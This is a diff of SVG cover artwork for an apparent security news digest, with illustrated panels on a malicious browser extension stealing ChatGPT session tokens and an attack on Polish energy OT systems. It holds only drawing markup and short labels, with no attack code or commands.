-  <text x="614" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOUD SEC</text>
-  <!-- Card 4: AI AGENT -->
-  <rect x="740" y="100" width="200" height="120" rx="8" fill="#071a10" stroke="#22c55e" stroke-width="1.5"/>
-  <circle cx="760" cy="120" r="6" fill="#22c55e"/>
-  <g transform="translate(840,148)">
-    <circle cx="-12" cy="-8" r="4" fill="none" stroke="#22c55e" stroke-width="1.5"/><circle cx="12" cy="-8" r="4" fill="none" stroke="#22c55e" stroke-width="1.5"/><circle cx="0" cy="8" r="5" fill="none" stroke="#22c55e" stroke-width="1.8"/><line x1="-8" y1="-6" x2="-2" y2="6" stroke="#22c55e" stroke-width="1.2" opacity="0.7"/><line x1="8" y1="-6" x2="2" y2="6" stroke="#22c55e" stroke-width="1.2" opacity="0.7"/><line x1="-8" y1="-8" x2="8" y2="-8" stroke="#22c55e" stroke-width="1.2" opacity="0.5"/>
+  <!-- Scene: browser window + extension badge + exfil arrow -->
+  <g transform="translate(168,136)">
+    <g filter="url(#softShadow)">
+      <rect x="-58" y="-30" width="116" height="56" rx="5" fill="#1E1006" stroke="#FFB703" stroke-width="1.6"/>
+      <rect x="-58" y="-30" width="116" height="14" rx="5" fill="#2A1A0A"/>
+      <circle cx="-44" cy="-23" r="3.5" fill="#E63946"/>
+      <circle cx="-34" cy="-23" r="3.5" fill="#FFB703"/>
+      <circle cx="-24" cy="-23" r="3.5" fill="#4ADE80"/>
+      <g transform="translate(26,-4)">
+        <rect x="-12" y="-10" width="24" height="20" rx="3" fill="#FFB703" opacity="0.9"/>
+        <rect x="-4" y="-14" width="8" height="6" rx="2" fill="#FFB703"/>
+        <rect x="12" y="-4" width="6" height="8" rx="2" fill="#FFB703"/>
+        <text x="0" y="4" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="900" fill="#1A1202">EXT</text>
+      </g>
+      <text x="-16" y="-2" text-anchor="middle" font-family="Inter, monospace" font-size="7" font-weight="800" fill="#4ADE80">ChatGPT</text>
+      <text x="-16" y="12" text-anchor="middle" font-family="Inter, monospace" font-size="5" fill="#FFD58A">TOKEN: ****</text>
+    </g>
+    <!-- Exfil animated arrow -->
+    <path d="M58 0 Q74 -14 86 0" stroke="#E63946" stroke-width="2" fill="none" stroke-dasharray="4 3">
+      <animate attributeName="stroke-dashoffset" values="0;-14" dur="1.2s" repeatCount="indefinite"/>
+    </path>
+    <circle cx="86" cy="0" r="4" fill="#E63946">
+      <animate attributeName="opacity" values="0.4;1;0.4" dur="1.2s" repeatCount="indefinite"/>
+    </circle>
+    <text x="0" y="46" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="800" fill="#FFB703">SESSION HIJACK</text>
   </g>
-  <text x="840" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22c55e" text-anchor="middle">AI AGENT</text>
-  <!-- Card 5: PATCH MGT -->
-  <rect x="956" y="100" width="212" height="120" rx="8" fill="#071a20" stroke="#22d3ee" stroke-width="1.5"/>
-  <circle cx="976" cy="120" r="6" fill="#22d3ee"/>
-  <g transform="translate(1062,148)">
-    <path d="M0,-18 L16,12 L-16,12 Z" fill="none" stroke="#22d3ee" stroke-width="1.8"/><text x="0" y="6" font-family="Courier New" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">CVE</text>
+  <!-- Attack chain -->
+  <g transform="translate(28,200)">
+    <rect x="0" y="0" width="280" height="34" rx="6" fill="#1E1006" stroke="#FFB703" stroke-width="1.2"/>
+    <circle cx="18" cy="17" r="7" fill="#FFB703"/>
+    <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#1A1202">1</text>
+    <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">Malicious extension installed</text>
+    <line x1="18" y1="38" x2="18" y2="50" stroke="#FFB703" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,54)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#1E1006" stroke="#FFB703" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#FFB703"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#1A1202">2</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">ChatGPT session token captured</text>
+    </g>
+    <line x1="18" y1="92" x2="18" y2="104" stroke="#FFB703" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,108)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#2A1A0C" stroke="#FFD58A" stroke-width="1.4"/>
+      <circle cx="18" cy="17" r="7" fill="#FFD58A"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#1A1202">3</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="800" fill="#F5F7FA">Affiliate link hijack + exfil</text>
+    </g>
   </g>
-  <text x="1062" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22d3ee" text-anchor="middle">PATCH MGT</text>
-
-  <!-- Threat map area -->
-  <rect x="32" y="240" width="1136" height="220" rx="10" fill="#0c1220" stroke="#1e293b" stroke-width="1"/>
-
-  <!-- Ambient dots -->
-  <g opacity="0.25">
-    <circle cx="180" cy="330" r="2" fill="#94a3b8"/><circle cx="200" cy="340" r="2" fill="#94a3b8"/>
-    <circle cx="550" cy="310" r="2" fill="#94a3b8"/><circle cx="570" cy="325" r="2" fill="#94a3b8"/>
-    <circle cx="750" cy="320" r="2" fill="#94a3b8"/><circle cx="900" cy="330" r="2" fill="#94a3b8"/>
-    <circle cx="350" cy="350" r="2" fill="#94a3b8"/><circle cx="1000" cy="340" r="2" fill="#94a3b8"/>
+  <!-- KPI pill -->
+  <g transform="translate(28,334)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="280" height="32" rx="8" fill="#2A1A0C" stroke="#FFB703" stroke-width="1.6"/>
+    <text x="14" y="21" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#FFB703">TARGET</text>
+    <text x="140" y="22" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="900" fill="#F5F7FA">ChatGPT Enterprise</text>
+    <text x="266" y="21" text-anchor="end" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#FFB703">Chrome</text>
   </g>
-  <!-- Node: SEC OPS -->
-  <circle cx="170" cy="340" r="22" fill="#1a0505" stroke="#ef4444" stroke-width="2"/>
-  <text x="170" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#ef4444" text-anchor="middle">SEC</text>
-  <!-- Node: THREAT INT -->
-  <circle cx="370" cy="350" r="20" fill="#1a0d0d" stroke="#f59e0b" stroke-width="2"/>
-  <text x="370" y="354" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#f59e0b" text-anchor="middle">THRE</text>
-  <!-- Node: CLOUD SEC -->
-  <circle cx="580" cy="330" r="22" fill="#0a1020" stroke="#3b82f6" stroke-width="2"/>
-  <text x="580" y="334" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOU</text>
-  <!-- Node: AI AGENT -->
-  <circle cx="780" cy="355" r="18" fill="#071a10" stroke="#22c55e" stroke-width="2"/>
-  <text x="780" y="359" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22c55e" text-anchor="middle">AI</text>
-  <!-- Node: PATCH MGT -->
-  <circle cx="980" cy="340" r="22" fill="#071a20" stroke="#22d3ee" stroke-width="2"/>
-  <text x="980" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">PATC</text>
-  <line x1="192" y1="340" x2="350" y2="350" stroke="#ef4444" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="390" y1="350" x2="558" y2="330" stroke="#f59e0b" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="602" y1="330" x2="762" y2="355" stroke="#3b82f6" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="798" y1="355" x2="958" y2="340" stroke="#22c55e" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
+</g>
 
-  <!-- Footer -->
-  <rect x="0" y="472" width="1200" height="158" fill="#080c18" opacity="0.95"/>
-  <rect x="0" y="472" width="1200" height="2" fill="#1e293b"/>
+<!-- COL C: Poland OT Attack (JAN 31) -->
+<g transform="translate(792,216)">
+  <rect x="0" y="0" width="336" height="374" rx="14" fill="url(#colC)" stroke="#E63946" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="336" height="4" fill="#E63946" opacity="0.7"/>
+  <g filter="url(#textShadow)">
+    <text x="20" y="28" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="700" fill="#F87171" letter-spacing="2.4">CRITICAL  /  OT/ICS</text>
+    <text x="20" y="54" font-family="Inter, Helvetica, Arial, sans-serif" font-size="20" font-weight="800" fill="#F5F7FA">Poland Energy OT Attack</text>
+    <text x="20" y="76" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="500" fill="#FBB6BD">30+ wind and solar plants targeted</text>
+  </g>
+  <!-- Scene: wind turbine (spinning) + solar panel + attack signal -->
+  <g transform="translate(168,136)">
+    <!-- Wind turbine tower -->
+    <rect x="-72" y="-8" width="8" height="42" rx="1" fill="#1E0A14" stroke="#FCA5A5" stroke-width="1.2"/>
+    <!-- Spinning turbine blades -->
+    <g transform="translate(-68,-8)">
+      <g stroke="#FCA5A5" stroke-width="1.6" fill="none">
+        <animateTransform attributeName="transform" type="rotate" from="0 0 0" to="360 0 0" dur="4s" repeatCount="indefinite"/>
+        <line x1="0" y1="0" x2="0" y2="-22"/>
+        <line x1="0" y1="0" x2="19" y2="11"/>
+        <line x1="0" y1="0" x2="-19" y2="11"/>
+      </g>
+    </g>
+    <!-- Solar panel -->
+    <g filter="url(#softShadow)">
+      <rect x="-8" y="8" width="48" height="26" rx="3" fill="#1E0A14" stroke="#FFB703" stroke-width="1.2"/>
+      <g stroke="#FFB703" stroke-width="0.8" opacity="0.6">
+        <line x1="-8" y1="17" x2="40" y2="17"/>
+        <line x1="-8" y1="26" x2="40" y2="26"/>
+        <line x1="8" y1="8" x2="8" y2="34"/>
+        <line x1="24" y1="8" x2="24" y2="34"/>
+      </g>
+    </g>
+    <!-- Attack signal waves from right -->
+    <g stroke="#E63946" stroke-width="1.6" fill="none" opacity="0.85">
+      <path d="M52 -10 Q64 -18 72 -10">
+        <animate attributeName="stroke-opacity" values="0.2;1;0.2" dur="1.4s" repeatCount="indefinite"/>
+      </path>
+      <path d="M52 0 Q68 -8 80 0">
+        <animate attributeName="stroke-opacity" values="0.2;1;0.2" dur="1.4s" begin="0.3s" repeatCount="indefinite"/>
+      </path>
+      <path d="M52 10 Q70 2 84 10">
+        <animate attributeName="stroke-opacity" values="0.2;1;0.2" dur="1.4s" begin="0.6s" repeatCount="indefinite"/>
+      </path>
+    </g>
+    <!-- OT compromised label -->
+    <g transform="translate(-22,52)">
+      <rect x="-34" y="-12" width="68" height="22" rx="4" fill="#1E0A14" stroke="#E63946" stroke-width="1.2"/>
+      <text x="0" y="3" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="800" fill="#F87171">OT COMPROMISED</text>
+    </g>
+  </g>
+  <!-- Attack chain -->
+  <g transform="translate(28,200)">
+    <rect x="0" y="0" width="280" height="34" rx="6" fill="#1E0A14" stroke="#E63946" stroke-width="1.2"/>
+    <circle cx="18" cy="17" r="7" fill="#E63946"/>
+    <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FFFFFF">1</text>
+    <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">SCADA network reconnaissance</text>
+    <line x1="18" y1="38" x2="18" y2="50" stroke="#E63946" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,54)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#1E0A14" stroke="#E63946" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#E63946"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FFFFFF">2</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">Coordinated OT intrusion</text>
+    </g>
+    <line x1="18" y1="92" x2="18" y2="104" stroke="#E63946" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,108)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#3A0F1A" stroke="#FCA5A5" stroke-width="1.4"/>
+      <circle cx="18" cy="17" r="7" fill="#FCA5A5"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#1A0005">3</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="800" fill="#F5F7FA">Energy supply disruption risk</text>
+    </g>
+  </g>
+  <!-- KPI pill -->
+  <g transform="translate(28,334)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="280" height="32" rx="8" fill="#3A0F1A" stroke="#E63946" stroke-width="1.6"/>
+    <text x="14" y="21" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#F87171">SRC</text>
+    <text x="140" y="22" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="14" font-weight="900" fill="#F5F7FA">CERT Polska</text>
+    <text x="266" y="21" text-anchor="end" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#F87171">30+ plants</text>
+  </g>
+</g>
 
-  <!-- Tags -->
-  <rect x="32" y="490" width="83" height="24" rx="4" fill="#1a0505" stroke="#ef4444" stroke-width="1"/>
-  <text x="73" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#ef4444" text-anchor="middle">SEC OPS</text>
-  <rect x="127" y="490" width="110" height="24" rx="4" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1"/>
-  <text x="182" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#f59e0b" text-anchor="middle">THREAT INT</text>
-  <rect x="249" y="490" width="101" height="24" rx="4" fill="#0a1020" stroke="#3b82f6" stroke-width="1"/>
-  <text x="299" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOUD SEC</text>
-  <rect x="362" y="490" width="92" height="24" rx="4" fill="#071a10" stroke="#22c55e" stroke-width="1"/>
-  <text x="408" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22c55e" text-anchor="middle">AI AGENT</text>
-  <rect x="466" y="490" width="101" height="24" rx="4" fill="#071a20" stroke="#22d3ee" stroke-width="1"/>
-  <text x="516" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22d3ee" text-anchor="middle">PATCH MGT</text>
+<!-- Ambient spark dots along timeline -->
+<g opacity="0.8">
+  <g fill="#8FB8FF">
+    <circle cx="360" cy="170" r="1.2"><animate attributeName="opacity" values="0;1;0" dur="2s" repeatCount="indefinite"/></circle>
+    <circle cx="500" cy="170" r="1.2"><animate attributeName="opacity" values="0;1;0" dur="2.2s" begin="0.4s" repeatCount="indefinite"/></circle>
+  </g>
+  <g fill="#FFD58A">
+    <circle cx="700" cy="170" r="1.2"><animate attributeName="opacity" values="0;1;0" dur="1.9s" repeatCount="indefinite"/></circle>
+    <circle cx="860" cy="170" r="1.2" opacity="0.5"/>
+  </g>
+  <g fill="#FCA5A5">
+    <circle cx="1060" cy="170" r="1.2"><animate attributeName="opacity" values="0;1;0" dur="2.0s" repeatCount="indefinite"/></circle>
+  </g>
+</g>
 
-  <!-- Bottom bar -->
-  <circle cx="32" cy="545" r="4" fill="#ef4444" opacity="0.6"/>
-  <text x="46" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569">Security Weekly Digest | January 31, 2026</text>
-  <text x="1168" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569" text-anchor="end">tech.2twodragon.com</text>
+<!-- cover-qr: https://tech.2twodragon.com/posts/2026/01/31/Tech_Security_Weekly_Digest_ShinyHunters_Vishing_Chrome_Extension_OT_Attack/ : 45x45 -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <g transform="scale(1.866667)" fill="#0A1020">
+    <path d="M0 0h7v1h-7zM8 0h2v1h-2zM12 0h1v1h-1zM18 0h1v1h-1zM20 0h4v1h-4zM26 0h2v1h-2zM30 0h2v1h-2zM36 0h1v1h-1zM38 0h7v1h-7zM0 1h1v1h-1zM6 1h1v1h-1zM8 1h1v1h-1zM12 1h4v1h-4zM22 1h3v1h-3zM27 1h3v1h-3zM31 1h3v1h-3zM35 1h1v1h-1zM38 1h1v1h-1zM44 1h1v1h-1zM0 2h1v1h-1zM2 2h3v1h-3zM6 2h1v1h-1zM8 2h1v1h-1zM10 2h4v1h-4zM15 2h2v1h-2zM18 2h1v1h-1zM20 2h1v1h-1zM22 2h1v1h-1zM26 2h1v1h-1zM28 2h2v1h-2zM32 2h2v1h-2zM35 2h1v1h-1zM38 2h1v1h-1zM40 2h3v1h-3zM44 2h1v1h-1zM0 3h1v1h-1zM2 3h3v1h-3zM6 3h1v1h-1zM9 3h2v1h-2zM12 3h1v1h-1zM15 3h5v1h-5zM23 3h1v1h-1zM25 3h1v1h-1zM27 3h3v1h-3zM31 3h3v1h-3zM35 3h2v1h-2zM38 3h1v1h-1zM40 3h3v1h-3zM44 3h1v1h-1zM0 4h1v1h-1zM2 4h3v1h-3zM6 4h1v1h-1zM8 4h1v1h-1zM10 4h1v1h-1zM12 4h2v1h-2zM17 4h1v1h-1zM19 4h8v1h-8zM28 4h1v1h-1zM30 4h1v1h-1zM33 4h4v1h-4zM38 4h1v1h-1zM40 4h3v1h-3zM44 4h1v1h-1zM0 5h1v1h-1zM6 5h1v1h-1zM10 5h1v1h-1zM12 5h2v1h-2zM20 5h1v1h-1zM24 5h2v1h-2zM27 5h1v1h-1zM30 5h3v1h-3zM38 5h1v1h-1zM44 5h1v1h-1zM0 6h7v1h-7zM8 6h1v1h-1zM10 6h1v1h-1zM12 6h1v1h-1zM14 6h1v1h-1zM16 6h1v1h-1zM18 6h1v1h-1zM20 6h1v1h-1zM22 6h1v1h-1zM24 6h1v1h-1zM26 6h1v1h-1zM28 6h1v1h-1zM30 6h1v1h-1zM32 6h1v1h-1zM34 6h1v1h-1zM36 6h1v1h-1zM38 6h7v1h-7zM9 7h4v1h-4zM14 7h2v1h-2zM17 7h1v1h-1zM20 7h1v1h-1zM24 7h3v1h-3zM28 7h1v1h-1zM31 7h1v1h-1zM33 7h1v1h-1zM35 7h1v1h-1zM0 8h1v1h-1zM3 8h7v1h-7zM11 8h3v1h-3zM15 8h2v1h-2zM18 8h1v1h-1zM20 8h5v1h-5zM28 8h3v1h-3zM33 8h3v1h-3zM37 8h1v1h-1zM40 8h1v1h-1zM42 8h3v1h-3zM0 9h3v1h-3zM5 9h1v1h-1zM8 9h2v1h-2zM12 9h1v1h-1zM18 9h2v1h-2zM21 9h1v1h-1zM23 9h1v1h-1zM25 9h2v1h-2zM29 9h2v1h-2zM32 9h5v1h-5zM38 9h2v1h-2zM41 9h3v1h-3zM2 10h5v1h-5zM8 10h1v1h-1zM12 10h1v1h-1zM14 10h5v1h-5zM22 10h1v1h-1zM24 10h1v1h-1zM27 10h1v1h-1zM29 10h1v1h-1zM33 10h2v1h-2zM36 10h2v1h-2zM39 10h1v1h-1zM41 10h4v1h-4zM0 11h1v1h-1zM4 11h2v1h-2zM8 11h2v1h-2zM14 11h1v1h-1zM17 11h2v1h-2zM21 11h4v1h-4zM28 11h3v1h-3zM32 11h1v1h-1zM34 11h1v1h-1zM36 11h1v1h-1zM42 11h1v1h-1zM2 12h1v1h-1zM4 12h7v1h-7zM12 12h1v1h-1zM14 12h1v1h-1zM18 12h1v1h-1zM22 12h1v1h-1zM24 12h1v1h-1zM28 12h1v1h-1zM31 12h4v1h-4zM37 12h2v1h-2zM40 12h1v1h-1zM43 12h1v1h-1zM0 13h1v1h-1zM2 13h3v1h-3zM7 13h3v1h-3zM11 13h2v1h-2zM19 13h1v1h-1zM21 13h1v1h-1zM23 13h2v1h-2zM26 13h5v1h-5zM32 13h1v1h-1zM36 13h3v1h-3zM40 13h1v1h-1zM44 13h1v1h-1zM3 14h4v1h-4zM8 14h1v1h-1zM10 14h17v1h-17zM31 14h1v1h-1zM35 14h1v1h-1zM38 14h4v1h-4zM0 15h6v1h-6zM8 15h1v1h-1zM10 15h1v1h-1zM12 15h2v1h-2zM17 15h1v1h-1zM19 15h5v1h-5zM25 15h2v1h-2zM29 15h3v1h-3zM34 15h2v1h-2zM37 15h2v1h-2zM40 15h4v1h-4zM0 16h1v1h-1zM3 16h2v1h-2zM6 16h1v1h-1zM8 16h3v1h-3zM12 16h1v1h-1zM15 16h2v1h-2zM18 16h2v1h-2zM21 16h4v1h-4zM26 16h1v1h-1zM29 16h2v1h-2zM32 16h1v1h-1zM34 16h1v1h-1zM38 16h1v1h-1zM41 16h1v1h-1zM43 16h2v1h-2zM0 17h3v1h-3zM11 17h4v1h-4zM16 17h2v1h-2zM22 17h1v1h-1zM25 17h1v1h-1zM27 17h2v1h-2zM30 17h1v1h-1zM32 17h3v1h-3zM36 17h2v1h-2zM39 17h1v1h-1zM44 17h1v1h-1zM0 18h1v1h-1zM2 18h1v1h-1zM6 18h2v1h-2zM9 18h1v1h-1zM12 18h1v1h-1zM15 18h3v1h-3zM20 18h1v1h-1zM24 18h2v1h-2zM28 18h1v1h-1zM37 18h1v1h-1zM44 18h1v1h-1zM0 19h1v1h-1zM2 19h2v1h-2zM9 19h1v1h-1zM14 19h1v1h-1zM16 19h3v1h-3zM20 19h2v1h-2zM23 19h2v1h-2zM26 19h2v1h-2zM29 19h3v1h-3zM33 19h1v1h-1zM35 19h1v1h-1zM39 19h4v1h-4zM44 19h1v1h-1zM0 20h9v1h-9zM10 20h3v1h-3zM16 20h3v1h-3zM20 20h6v1h-6zM28 20h1v1h-1zM30 20h1v1h-1zM34 20h7v1h-7zM42 20h1v1h-1zM0 21h3v1h-3zM4 21h1v1h-1zM8 21h1v1h-1zM13 21h3v1h-3zM20 21h1v1h-1zM24 21h3v1h-3zM28 21h7v1h-7zM36 21h1v1h-1zM40 21h4v1h-4zM1 22h1v1h-1zM3 22h2v1h-2zM6 22h1v1h-1zM8 22h1v1h-1zM10 22h1v1h-1zM13 22h2v1h-2zM16 22h1v1h-1zM20 22h1v1h-1zM22 22h1v1h-1zM24 22h6v1h-6zM31 22h2v1h-2zM34 22h1v1h-1zM36 22h1v1h-1zM38 22h1v1h-1zM40 22h5v1h-5zM0 23h1v1h-1zM4 23h1v1h-1zM8 23h1v1h-1zM12 23h3v1h-3zM16 23h2v1h-2zM19 23h2v1h-2zM24 23h2v1h-2zM27 23h1v1h-1zM32 23h5v1h-5zM40 23h1v1h-1zM42 23h3v1h-3zM0 24h1v1h-1zM2 24h1v1h-1zM4 24h8v1h-8zM13 24h1v1h-1zM15 24h1v1h-1zM19 24h6v1h-6zM28 24h2v1h-2zM32 24h1v1h-1zM34 24h1v1h-1zM36 24h5v1h-5zM43 24h2v1h-2zM3 25h3v1h-3zM7 25h6v1h-6zM18 25h1v1h-1zM20 25h1v1h-1zM22 25h3v1h-3zM26 25h1v1h-1zM29 25h2v1h-2zM33 25h1v1h-1zM42 25h2v1h-2zM1 26h3v1h-3zM5 26h3v1h-3zM11 26h3v1h-3zM19 26h3v1h-3zM25 26h2v1h-2zM28 26h2v1h-2zM31 26h1v1h-1zM33 26h1v1h-1zM36 26h1v1h-1zM39 26h1v1h-1zM41 26h1v1h-1zM0 27h1v1h-1zM2 27h3v1h-3zM7 27h3v1h-3zM17 27h2v1h-2zM21 27h2v1h-2zM24 27h5v1h-5zM31 27h1v1h-1zM34 27h2v1h-2zM40 27h1v1h-1zM42 27h3v1h-3zM0 28h2v1h-2zM4 28h1v1h-1zM6 28h2v1h-2zM9 28h2v1h-2zM12 28h2v1h-2zM15 28h2v1h-2zM19 28h2v1h-2zM23 28h1v1h-1zM25 28h2v1h-2zM30 28h1v1h-1zM32 28h1v1h-1zM35 28h1v1h-1zM40 28h2v1h-2zM2 29h3v1h-3zM9 29h3v1h-3zM13 29h1v1h-1zM16 29h1v1h-1zM19 29h3v1h-3zM25 29h1v1h-1zM30 29h3v1h-3zM34 29h1v1h-1zM38 29h3v1h-3zM44 29h1v1h-1zM0 30h1v1h-1zM4 30h4v1h-4zM10 30h1v1h-1zM12 30h4v1h-4zM17 30h3v1h-3zM22 30h1v1h-1zM25 30h1v1h-1zM29 30h1v1h-1zM31 30h3v1h-3zM35 30h8v1h-8zM44 30h1v1h-1zM0 31h1v1h-1zM7 31h2v1h-2zM15 31h4v1h-4zM20 31h1v1h-1zM22 31h3v1h-3zM26 31h6v1h-6zM33 31h1v1h-1zM35 31h3v1h-3zM41 31h3v1h-3zM0 32h2v1h-2zM3 32h1v1h-1zM5 32h2v1h-2zM9 32h1v1h-1zM12 32h1v1h-1zM14 32h4v1h-4zM19 32h2v1h-2zM22 32h3v1h-3zM28 32h2v1h-2zM31 32h1v1h-1zM33 32h2v1h-2zM36 32h2v1h-2zM41 32h1v1h-1zM44 32h1v1h-1zM12 33h4v1h-4zM19 33h1v1h-1zM24 33h3v1h-3zM28 33h3v1h-3zM32 33h4v1h-4zM39 33h2v1h-2zM42 33h1v1h-1zM4 34h1v1h-1zM6 34h2v1h-2zM9 34h3v1h-3zM13 34h1v1h-1zM18 34h1v1h-1zM21 34h1v1h-1zM25 34h1v1h-1zM27 34h3v1h-3zM35 34h2v1h-2zM38 34h2v1h-2zM43 34h2v1h-2zM1 35h4v1h-4zM7 35h2v1h-2zM10 35h3v1h-3zM14 35h3v1h-3zM18 35h1v1h-1zM21 35h2v1h-2zM24 35h3v1h-3zM30 35h1v1h-1zM32 35h1v1h-1zM36 35h3v1h-3zM42 35h2v1h-2zM0 36h1v1h-1zM3 36h2v1h-2zM6 36h1v1h-1zM8 36h1v1h-1zM10 36h4v1h-4zM15 36h3v1h-3zM20 36h5v1h-5zM28 36h1v1h-1zM30 36h1v1h-1zM32 36h10v1h-10zM44 36h1v1h-1zM8 37h4v1h-4zM16 37h3v1h-3zM20 37h1v1h-1zM24 37h1v1h-1zM26 37h8v1h-8zM35 37h2v1h-2zM40 37h3v1h-3zM0 38h7v1h-7zM8 38h2v1h-2zM11 38h5v1h-5zM20 38h1v1h-1zM22 38h1v1h-1zM24 38h2v1h-2zM27 38h2v1h-2zM35 38h2v1h-2zM38 38h1v1h-1zM40 38h1v1h-1zM42 38h1v1h-1zM0 39h1v1h-1zM6 39h1v1h-1zM8 39h1v1h-1zM10 39h3v1h-3zM17 39h4v1h-4zM24 39h2v1h-2zM31 39h2v1h-2zM34 39h3v1h-3zM40 39h4v1h-4zM0 40h1v1h-1zM2 40h3v1h-3zM6 40h1v1h-1zM8 40h1v1h-1zM10 40h1v1h-1zM12 40h3v1h-3zM17 40h2v1h-2zM20 40h6v1h-6zM30 40h3v1h-3zM34 40h1v1h-1zM36 40h5v1h-5zM43 40h1v1h-1zM0 41h1v1h-1zM2 41h3v1h-3zM6 41h1v1h-1zM8 41h3v1h-3zM13 41h2v1h-2zM17 41h1v1h-1zM21 41h3v1h-3zM25 41h1v1h-1zM27 41h1v1h-1zM30 41h6v1h-6zM38 41h3v1h-3zM43 41h2v1h-2zM0 42h1v1h-1zM2 42h3v1h-3zM6 42h1v1h-1zM20 42h2v1h-2zM23 42h3v1h-3zM29 42h2v1h-2zM33 42h1v1h-1zM36 42h1v1h-1zM38 42h1v1h-1zM40 42h1v1h-1zM44 42h1v1h-1zM0 43h1v1h-1zM6 43h1v1h-1zM9 43h4v1h-4zM14 43h2v1h-2zM17 43h3v1h-3zM21 43h3v1h-3zM25 43h2v1h-2zM28 43h2v1h-2zM33 43h4v1h-4zM38 43h2v1h-2zM42 43h3v1h-3zM0 44h7v1h-7zM8 44h2v1h-2zM11 44h2v1h-2zM16 44h1v1h-1zM18 44h1v1h-1zM23 44h2v1h-2zM26 44h1v1h-1zM28 44h2v1h-2zM31 44h1v1h-1zM35 44h1v1h-1zM37 44h3v1h-3zM41 44h1v1h-1z"/>
+  </g>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
 </svg>

--- a/assets/images/2026-02-01-Tech_Security_Weekly_Digest_AI_OpenSSL_Zero_Day_OWASP_Agentic_Fortinet.svg
+++ b/assets/images/2026-02-01-Tech_Security_Weekly_Digest_AI_OpenSSL_Zero_Day_OWASP_Agentic_Fortinet.svg
@@ -1,134 +1,346 @@
-<svg xmlns="http://www.w3.org/2000/svg" width="1200" height="630" viewBox="0 0 1200 630">
-  <title>Security Weekly Digest - February 01, 2026</title>
-  <defs>
-    <linearGradient id="bg" x1="0%" y1="0%" x2="100%" y2="100%">
-      <stop offset="0%" stop-color="#0a0e1a"/>
-      <stop offset="60%" stop-color="#0f1628"/>
-      <stop offset="100%" stop-color="#141b2d"/>
-    </linearGradient>
-    <linearGradient id="hg" x1="0%" y1="0%" x2="100%" y2="0%">
